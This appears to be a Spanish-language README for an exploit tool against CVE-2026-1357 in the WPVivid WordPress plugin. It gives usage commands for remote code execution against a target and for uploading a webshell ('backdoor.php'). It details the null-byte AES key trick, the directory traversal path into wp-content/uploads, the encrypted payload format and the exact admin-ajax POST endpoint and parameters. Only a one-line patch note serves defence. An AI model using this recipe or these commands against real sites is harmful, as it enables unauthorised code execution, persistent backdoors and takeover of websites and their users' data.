
Exploit para CVE-2026-1357 en el plugin WPVivid de WordPress, que permite la ejecución remota de código mediante payloads cifrados con AES manipulados y un directory traversal para subir un webshell.
pip3 install pycryptodome requests
python3 wpvivi.py http://target.com
python3 wpvivi.py http://target.com --shell backdoor.php
python3 wpvivi.py http://target.com --code "" Explicación técnica: Null Byte Key: Cuando RSA decrypt falla, devuelve false, que phpseclib trata como "\x00\x00\x00". Usamos 16 null bytes como clave AES-128 ECB. Directory Traversal: El nombre de archivo no está sanitizado, permitiendo ../../../../wp-content/uploads/shell.php Formato del payload:
[len_key_hex(2 bytes)] + [key_hex] + [len_data_hex(16 bytes)] + [encrypted_data] Ejecución: POST a /wp-admin/admin-ajax.php?action=wpvivid_action&wpvivid_action=send_to_site wpvivid_content = base64(payload cifrado) Detección y Mitigación:
Parcheado en 0.9.124:
if ($key === false || empty($key)) return false;